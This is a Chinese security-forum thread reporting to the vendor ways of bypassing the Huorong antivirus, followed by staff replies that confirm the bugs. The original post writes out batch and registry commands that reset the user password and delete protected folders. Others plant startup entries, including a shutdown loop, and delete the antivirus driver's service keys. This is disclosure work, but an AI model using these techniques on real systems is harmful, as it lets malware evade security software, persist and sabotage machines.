搜索
查看: 12668|回复: 55
收起左侧

[讨论] 火绒翻车实录(完结篇)

  [复制链接]
落华无痕
发表于 2020-8-24 20:56:08 | 显示全部楼层 |阅读模式
本帖最后由 落华无痕 于 2020-8-28 21:34 编辑

安装火绒默认设置情况下(开启所有防护情况下结果可能有所出入),开启自定义防护,重启系统再进行测试。

翻车现场一,更改用户名密码

1.使用批处理样本测试,内容如下:
  1. net user %username% infected
复制代码

成功拦截。

2.更改批处理代码,内容如下:
  1. copy %windir%\system32\net.exe %windir%\temp\
  2. %windir%\temp\net.exe user %username% infected
  3. pause
复制代码

成功拦截。

3.综合前面两次结果,发现最终修改用户名的程序是net1.exe。任务管理器查看net1.exe的命令行,发现使用方法跟net.exe一样。
改进代码如下:
  1. copy %windir%\system32\net1.exe %windir%\temp\
  2. %windir%\temp\net1.exe user %username% infected
  3. pause
复制代码



翻车!成功修改密码且火绒没反应!



翻车现场二、删除自定义防护目录

添加自定义规则保护桌面的test目录,禁止删除和执行,直接阻止。


1.正常删除和执行,成功拦截。



2.新建批处理代码如下,将test文件夹拖放到批处理上方释放。(原理:设置文件夹短文件名,用短文件名路径删除)
  1. fsutil file setshortname "%1" test~1
  2. rd /s /q %~p1test~1
  3. pause
复制代码


翻车!成功删除目录,火绒没有反应。(个别情况下可能删除失败)

3.新建批处理代码如下,将test文件夹拖放到批处理上方释放。(原理:重命名文件夹,再删除重命名后的文件夹)
  1. ren "%1" "%~n1_bak"
  2. rd /s /q "%~p1%~n1_bak"
  3. pause
复制代码


翻车!成功删除目录,火绒没有反应。(个别情况下可能删除失败)



翻车现场三、启动文件夹创建开机启动批处理。


1.新建批处理,代码如下:
  1. echo shutdown -s -t 3 >>"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\test.bat"
复制代码

成功拦截。

2.修改批处理,代码如下:
  1. ren "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" StartU
  2. echo shutdown -s -t 3 >>"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartU\test.bat"
  3. ren "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartU" StartUp
  4. pause
复制代码

翻车!成功创建开机启动项!

3.修改批处理代码如下:
  1. rd /s /q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  2. mkdir c:\windows\temp\test
  3. echo shutdown -s -t 3 >>c:\windows\temp\test\test.bat
  4. mklink /j "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" c:\windows\temp\test
  5. pause
复制代码


翻车!成功创建开机启动项!如果批处理使用前面修改用户密码的方法,重启后批处理可以实现反复关机。。。



翻车现场四、创建注册表Run启动项


开启所有注册表防护项目,在用户注册表Run下创建桌面test\test.exe的启动项。

1.新建批处理代码如下:
  1. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t reg_sz /d "%userprofile%\desktop\test\test.exe" /f
复制代码

成功拦截!

2.修改代码如下:
  1. cd %userprofile%\desktop\test
  2. reg save "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.hiv
  3. reg load HKLM\Run run.hiv
  4. reg add HKLM\Run /v test /t reg_sz /d "%userprofile%\desktop\test\test.exe" /f
  5. reg unload HKLM\Run
  6. echo y|reg restore "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.hiv
  7. del /a /f run*
  8. pause
复制代码




翻车!成功创建开机启动项!



翻车现场五、创建注册表ShellIconOverlayIdentifiers启动项

展开以下注册表项并导出ShellIconOverlayIdentifiers:
  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers
复制代码
尝试在ShellIconOverlayIdentifiers新建项:

成功拦截!

编辑导出的reg,查找:
  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
复制代码
替换:
  1. HKEY_CURRENT_USER\test
复制代码
保存后双击导入(除非自定义规则,否则这步火绒不会有反应)。可以编辑test项加入要启动项目(火绒也没反应的)。

删除注册表项ShellIconOverlayIdentifiers(本该有反应,但火绒没有)。

用软件Registry Workshop在Explorer下新建符号链接ShellIconOverlayIdentifiers指向HKEY_CURRENT_USER\test\ShellIconOverlayIdentifiers。



翻车!成功创建开机启动项!

翻车现场六、虚拟机利用断电关机或PCHunter暴力重启直接干掉火绒主防驱动



尝试用批处理删除注册表,火绒拦截,后续改成用reg文件删除。


新建reg内容如下:
  1. Windows Registry Editor Version 5.00

  2. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\sysdiag]
  3. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\hrwfpdrv]
  4. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\hrdevmon]
  5. [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\HipsDaemon]
  6. [HKEY_LOCAL_MACHINE\SYSTEM\Select]
  7. "Current"=dword:00000002
  8. "Default"=dword:00000002
复制代码
双击导入(火绒没有拦截),虚拟机断电关机,或pchunter暴力重启。


重启后。。。

这时候可以轻松结束残留进程和删除文件。


翻车!主防彻底挂掉。注意以上是在虚拟机下测试,实机可能不同,谁有条件的实机测试下?

内容六,可能是我虚拟机的问题,测试不能复现。补充一种。
利用PendingFileRenameOperations替换系统文件实现开机启动。有现成的样本:
谁用实验机分析一下怎么手杀这个445病毒


样本成功执行,开启所有系统防护项目的火绒没有拦截提示。


重启后。病毒成功释放rootkit程序。



翻车!病毒成功执行。






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 10经验 +40 分享 +3 魅力 +1 人气 +15 收起 理由
swizzer + 1 版区有你更精彩: )
無爱 + 3 版区有你更精彩: )
2849 + 3 精品文章
myGXW + 3 版区有你更精彩: )
屁颠屁颠 + 1 版区有你更精彩: )

查看全部评分

QWEASDZXCRFV
头像被屏蔽
发表于 2020-8-28 18:52:29 | 显示全部楼层
您好, 您反馈的问题:
问题2已确认是bug,bugid:27813
问题3、4、5:问题确认,测试后会在近期更新防御规则拦截
问题6:断电关机测试未能复现,PChunter可以使用执行控制进行拦截.

感谢您的反馈~
zay365
头像被屏蔽
发表于 2020-8-24 21:09:07 | 显示全部楼层
http://bbs.huorong.cn/thread-66524-1-1.html
重命名这点之前好像有人提到过
zhaublitz
发表于 2020-8-25 10:30:59 | 显示全部楼层
1-3和3-2可以复现
但是2-2我这边测试可以正常拦截。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
落华无痕
 楼主| 发表于 2020-8-25 10:38:27 | 显示全部楼层
本帖最后由 落华无痕 于 2020-8-25 12:41 编辑
zhaublitz 发表于 2020-8-25 10:30
1-3和3-2可以复现
但是2-2我这边测试可以正常拦截。

是的,这个很奇怪。我一开始测试不能拦截,后面又测试一次像你这样拦截了,再次测试又不拦截。
不知道哪个步骤出问题了。所以我说个别情况下可能失败。
又测试了一遍不拦截。。。我很肯定之前有一次像你这样能拦截的,所以我才保留怀疑。
附上视频录像:
https://www.lanzoux.com/iUImLg14xkj
MagicFuzzX
发表于 2020-8-25 12:57:50 | 显示全部楼层
good job
tianhu3
发表于 2020-8-25 14:55:53 | 显示全部楼层
gqy
发表于 2020-8-25 15:53:36 | 显示全部楼层
你们真的闲的难受啊这都能挖掘出来
火绒工程师
发表于 2020-8-25 15:58:37 | 显示全部楼层
本帖最后由 火绒工程师 于 2020-8-26 13:11 编辑

您好,根据您反馈的问题回复如下:问题一,对系统文件改名或移动后执行危险动作的情况,主防只针对单点的高危动作进行防御,所以暂时此类情况不支持拦截,如果存在病毒通用行为,后续会考虑添加恶意行为分析进行拦截,如果是少量零散样本暂时会以查杀为主。 问题二,您提到的自定义防护规则问题,与问题一类似,主防只针对单点的高危动作进行防御,所以暂时不支持拦截,如果您发现有病毒利用此种方式执行恶意行为的情况,可以向我们上传相关样本。 问题三 和 问题四 需要相关技术人员确认后进行酌情处理。感谢您的反馈,我们会继续跟进此问题~
vm001
发表于 2020-8-25 16:18:55 | 显示全部楼层
火绒工程师 发表于 2020-8-25 15:58
您好,根据您反馈的问题回复如下:问题一,对系统文件改名或移动后执行危险动作的情况,主防只针对单点的高 ...

嗯,火绒是保卫电脑系统,军队是保护国家安全,近几年没见哪个国家来侵略中国,国家还研发这个那个,养那么多军队有啥用,应该学习火绒这种思想,等到威胁到来或者有老百姓反应被XX了在招军队也不迟。
wwwab
发表于 2020-8-25 16:48:02 | 显示全部楼层
vm001 发表于 2020-8-25 16:18
嗯,火绒是保卫电脑系统,军队是保护国家安全,近几年没见哪个国家来侵略中国,国家还研发这个那个,养那 ...

这肯定不一样啊,杀毒软件之所以杀毒软件,有毒给他他才能杀,先有病毒才会诞生杀毒软件,有了新的病毒杀毒软件才能加库,不像啥军队可以提前准备好的啊,杀毒软件本来就是这样的嘛。虽然说主防是新型未知病毒的最后一道防线,但是杀毒软件怎么去防都有自己的见解,这是一项技术,这就像语文题目,有两面性,你看他是坏的,不一定就没人没道理看他是好的,既然目前他们那边见解这样那就这样呗
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 湘ICP备2021004765号-1 ) GMT+8, 2021-9-21 06:32 , Processed in 0.140397 second(s), 21 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表